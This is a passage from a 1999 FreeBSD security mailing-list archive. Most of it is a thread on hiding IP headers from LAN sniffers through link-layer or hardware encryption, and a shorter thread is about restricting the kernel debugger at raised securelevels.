guppy.pond.net (8.9.3/8.9.3) with ESMTP id XAA25403; Mon, 6 Sep 1999 23:37:22 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4B32E.CD58CA8E@aracnet.com> Date: Mon, 06 Sep 1999 23:39:42 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: Gary Palmer , freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <199909070542.WAA04637@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > dmp@aracnet.com wrote in message ID > > <37D496A5.A0576E0F@aracnet.com>: > > > Is it possible to encrypt ethernet packets so that all layers above > > > layer 2 would be encrypted? The idea I had was to make a device that > > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > > doable? Viable? A reinvention of the wheel? > > > > How would you route the traffic? No routers would be able to pass the > > traffic. > > No, only routers knowing the key would be able to route traffic. In my idea, only the machine to which the packet is being sent would have the decryption key. If the router had the decryption key, it would mean that it would have to be programmable for it to load the right decryption key. That opens a security hole in which a DoS could be executed by corrupting the router's keys. The router's key cache would also have to be retrivable, making it possible to steal the keys from the router. A hardcoded decryption key is the only answer. Not completely secure in and of itself, but to compromise it would require a physical effort, not just an electronic/software one. > > If you are doing this for a local LAN, I suggest you have bigger > > problems :) > > Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan > and several other wireless cards do DES encryption at layer 1... so > it _can_ be done. And more importantly is being done (first hand > knowledge on that one). It's a wired LAN. UTP. Layer 1 encryption wouldn't work unless all devices on the LAN had the same key pair. Great for preventing unauthorized use of the network, but it doesn't do a thing to prevent sniffing by an authorized machine. Unauthorized use of the network isn't an issue, but sniffable traffic is. I like your solution, though. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:54:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv.osi.ru (netserv.osi.ru [195.178.193.139]) by hub.freebsd.org (Postfix) with ESMTP id 9C7DD14EBB for ; Mon, 6 Sep 1999 23:54:41 -0700 (PDT) (envelope-from ks@itp.ac.ru) Received: from ntgate.osi.ru (ntgate.osi.ru [195.178.194.141]) by netserv.osi.ru (8.9.1a/8.9.1) with SMTP id KAA09896; Tue, 7 Sep 1999 10:55:10 +0400 (MSK/MSD) Received: from speecart.osi.ru ([195.178.194.35]) by ntgate.osi.ru (Lotus SMTP MTA v4.6.5 (863.2 5-20-1999)) with SMTP id C32567E5.0025FCB7; Tue, 7 Sep 1999 10:54:55 +0400 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <37D4ABCB.E683ABC@aracnet.com> Date: Tue, 07 Sep 1999 10:56:29 +0400 (MSD) Reply-To: ks@itp.ac.ru Organization: OSI AF, Moscow office From: "Sergey S. Kosyakov" To: dmp@aracnet.com, freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? Cc: ks@itp.ac.ru Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 07-Sep-99 dmp@aracnet.com wrote: > "Sergey S. Kosyakov" wrote: >> On 07-Sep-99 dmp@aracnet.com wrote: >> > Is it possible to encrypt ethernet packets so that all layers above >> > layer 2 would be encrypted? The idea I had was to make a device that >> > could defeat a TCP sniffer by encrypting the IP headers. Is this >> > doable? Viable? A reinvention of the wheel? >> > >> >> You can establish secure tunnel with TUND - over tun(4) pseudo-devices if >> you >> use routing, or over divert(4) sockets with ipfw(8) rules for LAN. > > Both of which require that unencrypted IP headers be used. This > allows the use of a TCP sniffer to monitor from where and to whom > traffic is going. By the standards of my group, that's a security > problem. Could you please describe you problem more detailed - I mean what do you want to do? You want hide from where and to whom traffic is going on Ethernet LAN, isn't it? Then use ethernet switching hub. --- ---------------------------------- E-Mail: Sergey S. Kosyakov Date: 07-Sep-99 Time: 10:51:10 ---------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 6 23:56:21 1999 Delivered-To: freebsd-security@freebsd.org Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4]) by hub.freebsd.org (Postfix) with ESMTP id E106E14EBB; Mon, 6 Sep 1999 23:56:16 -0700 (PDT) (envelope-from freebsd@gndrsh.dnsmgr.net) Received: (from freebsd@localhost) by gndrsh.dnsmgr.net (8.9.3/8.9.3) id XAA04873; Mon, 6 Sep 1999 23:56:06 -0700 (PDT) (envelope-from freebsd) From: "Rodney W. Grimes" Message-Id: <199909070656.XAA04873@gndrsh.dnsmgr.net> Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4B32E.CD58CA8E@aracnet.com> from "dmp@aracnet.com" at "Sep 6, 1999 11:39:42 pm" To: dmp@aracnet.com Date: Mon, 6 Sep 1999 23:56:06 -0700 (PDT) Cc: gpalmer@FreeBSD.ORG (Gary Palmer), freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [Charset UTF-8 unsupported, skipping...] [pulled contect from save of message...] > "Rodney W. Grimes" wrote: > > > dmp@aracnet.com wrote in message ID > > > <37D496A5.A0576E0F@aracnet.com>: > > > > Is it possible to encrypt ethernet packets so that all layers above > > > > layer 2 would be encrypted? The idea I had was to make a device that > > > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > > > doable? Viable? A reinvention of the wheel? > > > > > > How would you route the traffic? No routers would be able to pass the > > > traffic. > > > > No, only routers knowing the key would be able to route traffic. > > In my idea, only the machine to which the packet is being sent would > have the decryption key. If the router had the decryption key, it > would mean that it would have to be programmable for it to load the > right decryption key. Usually one key per interface, not a big deal, and required for what I was discussing since this even encrypts the MAC address. > That opens a security hole in which a DoS > could be executed by corrupting the router's keys. The router's key > cache would also have to be retrivable, making it possible to steal > the keys from the router. You can't corrupt the router key unless you know the key, it won't hear you unless your data is properly encrypted. Remeber this is layer 1 encryption, so you have to know the key to encrypt the MAC to get the router to even listen to you. You can steal ``physcially'' steal the keys from the router itself, but then we would have to post armed gards as others mentioned to stop physical access attacks. > > A hardcoded decryption key is the only answer. Not completely > secure in and of itself, but to compromise it would require a > physical effort, not just an electronic/software one. See above... > > > > If you are doing this for a local LAN, I suggest you have bigger > > > problems :) > > > > Maybe the LAN is ``wireless'' :-). But more seriously the Wavelan > > and several other wireless cards do DES encryption at layer 1... so > > it _can_ be done. And more importantly is being done (first hand > > knowledge on that one). > > It's a wired LAN. UTP. Layer 1 encryption wouldn't work unless all > devices on the LAN had the same key pair. Great for preventing > unauthorized use of the network, but it doesn't do a thing to prevent > sniffing by an authorized machine. Unauthorized use of the network > isn't an issue, but sniffable traffic is. Hummm... defantitly a different problem than we are solving... and defanitly different than the wireless problem we did solve. > I like your solution, though. > -- Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 0: 2:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from pik.gammanet.com.pl (pik-gate.gammanet.com.pl [150.254.163.165]) by hub.freebsd.org (Postfix) with ESMTP id CF85A159AA for ; Tue, 7 Sep 1999 00:02:03 -0700 (PDT) (envelope-from Robert@gammanet.pl) Received: from pc55 ([150.254.192.55]) by pik.gammanet.com.pl (8.9.2/8.9.2) with SMTP id JAA14158 for ; Tue, 7 Sep 1999 09:11:19 +0200 (CEST) Message-Id: <3.0.5.32.19990907090432.009d69b0@mail.gammanet.pl> X-Sender: robson@mail.gammanet.pl X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32) Date: Tue, 07 Sep 1999 09:04:32 +0200 To: freebsd-security@freebsd.org From: Robert Posiadala Subject: unsubscribe Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 0:20:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id CDC8A14EDF for ; Tue, 7 Sep 1999 00:20:51 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id AAA28450; Tue, 7 Sep 1999 00:18:13 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4BCC2.34AFAE9D@aracnet.com> Date: Tue, 07 Sep 1999 00:20:34 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: ks@itp.ac.ru Cc: freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Sergey S. Kosyakov" wrote: > On 07-Sep-99 dmp@aracnet.com wrote: >> "Sergey S. Kosyakov" wrote: >>> On 07-Sep-99 dmp@aracnet.com wrote: >>> > Is it possible to encrypt ethernet packets so that all layers above >>> > layer 2 would be encrypted? The idea I had was to make a device that >>> > could defeat a TCP sniffer by encrypting the IP headers. Is this >>> > doable? Viable? A reinvention of the wheel? >>> > >>> >>> You can establish secure tunnel with TUND - over tun(4) pseudo-devices if >>> you >>> use routing, or over divert(4) sockets with ipfw(8) rules for LAN. >> >> Both of which require that unencrypted IP headers be used. This >> allows the use of a TCP sniffer to monitor from where and to whom >> traffic is going. By the standards of my group, that's a security >> problem. > > Could you please describe you problem more detailed - I mean what do you want > to do? You want hide from where and to whom traffic is going on Ethernet LAN, > isn't it? Then use ethernet switching hub. I have two problems. The first is that EM emissions on UTP allows one to monitor all traffic on that cable. The second is that a sniffer run on an authorized machine will be able to see the source and destination IP and port of all IP traffic on it's segment. I want to fix both problems. Encrypting everything above layer 2 does this. The only determinable aspects of the packets would be the source and destination MAC addresses, relatively sufficient security given the security policy and topology of the network in question. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 0:20:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 0B0D315175 for ; Tue, 7 Sep 1999 00:20:52 -0700 (PDT) (envelope-from randy@psg.com) Received: from localhost (808 bytes) by rip.psg.com via sendmail with P:stdio/R:inet_resolve/T:smtp (sender: ) (ident using unix) id for ; Tue, 7 Sep 1999 00:20:51 -0700 (PDT) (Smail-3.2.0.101 1997-Dec-17 #1 built 1999-Apr-1) Message-Id: Date: Tue, 7 Sep 1999 00:20:51 -0700 (PDT) From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Bruce Evans Cc: freebsd-security@freebsd.org Subject: Re: Init(8) cannot decrease securelevel Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > date: 1997/06/25 07:31:47; author: joerg; state: Exp; lines: +2 -2 > Don't ever allow lowering the securelevel at all. Allowing it does > nothing good except of opening a can of (potential or real) security > holes. People maintaining a machine with higher security requirements > need to be on the console anyway, so there's no point in not forcing > them to reboot before starting maintenance. the only time this is annoying to me is that i have to reboot before doing a buildworld. randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 1:20: 1 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id C209A15572 for ; Tue, 7 Sep 1999 01:19:57 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA02189; Tue, 7 Sep 1999 01:15:18 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4CA23.6A64FCAC@aracnet.com> Date: Tue, 07 Sep 1999 01:17:39 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Mike Nowlin Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Mike Nowlin wrote: > > The network in question doesn't use IP-based routing. > > > > > If you are doing this for a local LAN, I suggest you have bigger > > > problems :) > > > > You're right, I do have bigger problems. Like deep paranoia among > > the users of the LAN. > > I'm having trouble grasping the idea behind this... Generally speaking, > even if you couldn't see the IP src and dst addrs for a packet (as if they > were encrypted), you could still see the ethernet addresses, and those are > almost as good when it comes to local networks. Anybody with half a clue > could figure out which ethernet addresses match up to which machines and > their uses. True, you can determine which hardware devices are sending and receiving the traffic, but with layer 3 encrypted, that's all you can see. You wouldn't be able to determine which IP or port the packet is coming from or going to, not even if it's IP traffic or not. > As far as the paranoia, it sounds like your users know enough to be > dangerous, but don't really understand the problem. Marketing people, > perhaps? :) We got rid of the marketing people last year when we determined that the ability for our organization to pander to the general public was a security risk. :) > Assuming someone has physical access to something (the ethernet) that > carries traffic they're not supposed to see (like the packets in > question), there's little you can do to ensure that somebody can't figure > out a way around your security. If that isn't enough, you start looking > into managed switches, locked server rooms, and (if all else fails) a new > profession. In order: A machine on the network can't see any other machine other that it's firewall interface until the DC authorizes it's presence. Managed switches aren't used, we haven't found one that can provide a high enough level of security. The server rooms already are locked. A new profession? I hope you're kidding. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 1:27:17 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id F0C0615579; Tue, 7 Sep 1999 01:27:11 -0700 (PDT) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA27848; Tue, 7 Sep 1999 10:26:18 +0200 (CEST) (envelope-from des) To: Matthew Dillon Cc: "Matthew D. Fuller" , Dag-Erling Smorgrav , KATO Takenori , bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel References: <199909060513.PAA12402@godzilla.zeta.org.au> <19990906142342F.kato@gneiss.eps.nagoya-u.ac.jp> <199909061539.IAA74893@apollo.backplane.com> <19990906141231.L18814@futuresouth.com> <199909062029.NAA76229@apollo.backplane.com> From: Dag-Erling Smorgrav Date: 07 Sep 1999 10:26:18 +0200 In-Reply-To: Matthew Dillon's message of "Mon, 6 Sep 1999 13:29:44 -0700 (PDT)" Message-ID: Lines: 14 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon writes: > So making DDB 'secure-level friendly' would be a useful thing > tgo do, I think. The idea is not to disable DDB, but to simply > limit the actions that can be performed within it if the securelevel > has been raised. The sysadmin would only be allowed to issue > passive commands, cont, and 'panic'. The sysadmin would not be > allowed to modify the running system. That's an excellent idea - it shouldn't be too hard to add a kernel option (say, DDB_RESTRICTED) and #ifndef the "dangerous" commands. DES (must... write... patches...) -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 1:34: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id C07A0155D3 for ; Tue, 7 Sep 1999 01:34:04 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA03156; Tue, 7 Sep 1999 01:31:16 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4CDE1.8FF6DA73@aracnet.com> Date: Tue, 07 Sep 1999 01:33:37 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Christian Kuhtz Cc: "Bryan Smith (Administrator)" , freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <37D496A5.A0576E0F@aracnet.com> <19990907010827.A124@ns1.adsu.bellsouth.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Christian Kuhtz wrote: > > Err, there are some things that don't run easily over SSH. > > You could approach this at least four ways (that I can think of): > > a) write a device driver layer which inserts link layer encryption and > crypto management functions. - you'd need to do this with each box > and device driver you want to be able to communicate with each > other -- very cumbersome, IMHO, and a bad idea unless you got a > damn good reason to do so. > > b) use IPv4 IPSec -- pain in the a** after all the junk we had to deal > with in my professional life. Lots and lots of interop issues. > > c) use IPv6 IPSec -- learning curve to properly run IPv6 may be a bit > high, but the rest is pretty straightforward and IMHO more clean > than IPv4 IPSec, particularly IPSec host-mode. > > d) use SSL style application layer encryption. -- by far the most > portable implementation. All of these are software-based security measures. In other words, they aren't very good. > It'd help if you could describe a little more of what exactly you're trying > to do.. What it comes down to is a hardware-based means of encrypting ethernet traffic in a way that allows only the MAC address to be seen. I won't go into much detail about the network in question. I will say that an unencrypted MAC address is required, and that only the source and destination computers need know the unencrypted contents of layers 3 and higher. > Ask yourself who you mistrust and who you trust in your application. That's > usually the best way to approach encryption, unless you are a marketing > moron^H^H^H^H^Hgenius. I mistrust everyone in general. I grant trust to those I must deal with, in order to deal with them. When I'm not dealing with someone, I do not trust them. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 2: 9: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id F009A15A92; Tue, 7 Sep 1999 02:08:42 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id CAA05236; Tue, 7 Sep 1999 02:06:06 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4D60C.8AF45A7B@aracnet.com> Date: Tue, 07 Sep 1999 02:08:28 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: Gary Palmer , freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <199909070656.XAA04873@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > "Rodney W. Grimes" wrote: > > > > dmp@aracnet.com wrote in message ID > > > > <37D496A5.A0576E0F@aracnet.com>: > > > > > Is it possible to encrypt ethernet packets so that all layers above > > > > > layer 2 would be encrypted? The idea I had was to make a device that > > > > > could defeat a TCP sniffer by encrypting the IP headers. Is this > > > > > doable? Viable? A reinvention of the wheel? > > > > > > > > How would you route the traffic? No routers would be able to pass the > > > > traffic. > > > > > > No, only routers knowing the key would be able to route traffic. > > > > In my idea, only the machine to which the packet is being sent would > > have the decryption key. If the router had the decryption key, it > > would mean that it would have to be programmable for it to load the > > right decryption key. > > Usually one key per interface, not a big deal, and required for what > I was discussing since this even encrypts the MAC address. However, that means that every device on the network must have a key. For devices like routers and switches, which don't provide absolute control over security, allowing them to de/encrypt traffic is a security hole. With only the workstations and servers having keys and running open-source software, there are fewer security holes, plus a far greater level of control can be exercised. > > That opens a security hole in which a DoS > > could be executed by corrupting the router's keys. The router's key > > cache would also have to be retrivable, making it possible to steal > > the keys from the router. > > You can't corrupt the router key unless you know the key, it won't > hear you unless your data is properly encrypted. Remeber this is > layer 1 encryption, so you have to know the key to encrypt the MAC > to get the router to even listen to you. With that method, the packet has to be decrypted, analysed, then reencrypted at each hop, making each hop a security risk. By having the source encrypt the packet to the destination's key, leaving layer 2 intact, the packet can remain encrypted for the entire trip, with only the source and destination knowing the real nature of the data being sent. > You can steal ``physcially'' steal the keys from the router itself, > but then we would have to post armed gards as others mentioned to > stop physical access attacks. Well, they aren't armed, at least not with guns. Not the ones inside the building, any way. A lot of computer equipment doesn't react well to bullets. :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 2:40:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from eclogite.eps.nagoya-u.ac.jp (eclogite.eps.nagoya-u.ac.jp [133.6.124.145]) by hub.freebsd.org (Postfix) with ESMTP id E83A915546; Tue, 7 Sep 1999 02:40:23 -0700 (PDT) (envelope-from kato@ganko.eps.nagoya-u.ac.jp) Received: from localhost (gneiss.eps.nagoya-u.ac.jp [133.6.124.148]) by eclogite.eps.nagoya-u.ac.jp (8.9.3/3.7W) with ESMTP id SAA04514; Tue, 7 Sep 1999 18:36:38 +0900 (JST) To: des@flood.ping.uio.no Cc: dillon@apollo.backplane.com, fullermd@futuresouth.com, kato@ganko.eps.nagoya-u.ac.jp, bde@zeta.org.au, freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Init(8) cannot decrease securelevel From: KATO Takenori In-Reply-To: Your message of "07 Sep 1999 10:26:18 +0200" References: X-Mailer: Mew version 1.93 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint: 03 72 85 36 62 46 23 03 52 B1 10 22 44 10 0D 9E Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990907183608S.kato@gneiss.eps.nagoya-u.ac.jp> Date: Tue, 07 Sep 1999 18:36:08 +0900 X-Dispatcher: imput version 980905(IM100) Lines: 19 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > That's an excellent idea - it shouldn't be too hard to add a kernel > option (say, DDB_RESTRICTED) and #ifndef the "dangerous" commands. To achieve both higher security and kenel hackers convenience, I'd submit following idea: - If securelevel > 1, DDB is in restricted mode. - If securelevel > 1 and an option is defined, DDB is in powerful mode. - If securelvel < 1, DDB is in powerful mode. -----------------------------------------------+--------------------------+ KATO Takenori | FreeBSD | Dept. Earth Planet. Sci, Nagoya Univ. | The power to serve! | Nagoya, 464-8602, Japan | http://www.FreeBSD.org/ | ++++ FreeBSD(98) 3.2: Rev. 01 available! |http://www.jp.FreeBSD.org/| ++++ FreeBSD(98) 2.2.8: Rev. 02 available! +==========================+ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 3:38:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id A122214E48 for ; Tue, 7 Sep 1999 03:38:21 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id DAA10341; Tue, 7 Sep 1999 03:34:55 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D4EADE.6F1506F4@aracnet.com> Date: Tue, 07 Sep 1999 03:37:18 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <199909070904.CAA05294@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > What it comes down to is a hardware-based means of encrypting > > ethernet traffic in a way that allows only the MAC address to be > > seen. I won't go into much detail about the network in question. > > I will say that an unencrypted MAC address is required, and that only > > the source and destination computers need know the unencrypted > > contents of layers 3 and higher. > > This can be done, even in software, though it is not going to be either > fast due to DES or any other cryptograph overhead or easy to do with > any off the shelf software due to mods required. Getting software that could do the work isn't a problem. Running that software on computers that don't have good FP performance is. > It might be easier to do this in hardware, just like was done on the > Wavelan stuff, only modify the crypt/decrypt engine so that it skips > the MAC address bytes. You could even glue this into a modified NIC > card between the NIC chip and the MII with a custom ASIC. You'd need > a way to program the keys, and a few other details, but not that hard > to do. This was pretty much the idea I had come up with. I had my eye on a cypher chip and a socketed ROM that would let you change the keys for the NIC just by swapping ROMs. Chassis intrusion is a small risk in this case. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:41:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 03A3614F49 for ; Tue, 7 Sep 1999 06:41:21 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id JAA11485; Tue, 7 Sep 1999 09:39:17 -0400 (EDT) (envelope-from wollman) Date: Tue, 7 Sep 1999 09:39:17 -0400 (EDT) From: Garrett Wollman Message-Id: <199909071339.JAA11485@khavrinen.lcs.mit.edu> To: dmp@aracnet.com Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4BCC2.34AFAE9D@aracnet.com> References: <37D4BCC2.34AFAE9D@aracnet.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < I have two problems. The first is that EM emissions on UTP allows > one to monitor all traffic on that cable. Use fiber NICs. > The second is that a > sniffer run on an authorized machine will be able to see the source > and destination IP and port of all IP traffic on it's segment. Use a good switch and hard-wire the bridge table. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:43: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from SLIS-TWO.lis.fsu.edu (SLIS-TWO.lis.fsu.edu [128.186.45.2]) by hub.freebsd.org (Postfix) with ESMTP id CD2C114D70 for ; Tue, 7 Sep 1999 06:42:51 -0700 (PDT) (envelope-from david@SLIS-TWO.lis.fsu.edu) Received: from localhost (david@localhost) by SLIS-TWO.lis.fsu.edu (8.8.5/8.8.5) with SMTP id JAA00852; Tue, 7 Sep 1999 09:30:58 -0400 (EDT) Date: Tue, 7 Sep 1999 09:30:57 -0400 (EDT) From: David Miner To: dmp@aracnet.com Cc: "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D4EADE.6F1506F4@aracnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In regards to the other problem of EM from the UTP, have your uses given thought to running the lines through shielded conduit. Are they running TEMPEST tested boxes for the problem of radiation from the monitors? Is each end in a shielded, grounded room? If they are that parinoid about a sniffer from an authorized machine, they should be worried about the radiation of unecrypted information after the data has been passed to the destination machine. Regards, David --------------------------------------------------------------------- David R. Miner miner@lis.fsu.edu Systems Manager voice: 850-644-8107 School of Information Studies fax: 850-644-6253 Florida State University Tallahassee, FL 32306-2100 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Sep 7 6:55:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from backup.af.speednet.com.au (af.speednet.com.au [202.135.206.244]) by hub.freebsd.org (Postfix) with ESMTP id 3EC8215582 for ; Tue, 7 Sep 1999 06:55:46 -0700 (PDT) (envelope-from andyf@speednet.com.au) Received: from localhost (localhost [127.0.0.1]) by backup.af.speednet.com.au (8.9.3/8.9.3) with ESMTP id XAA22866; Tue, 7 Sep 1999 23:52:27 +1000 (EST) (envelope-from andyf@speednet.com.au) Date: Tue, 7 Sep 1999 23:52:27 +1000 (EST) From: Andy Farkas X-Sender: andyf@localhost To: Dag-Erling Smorgrav 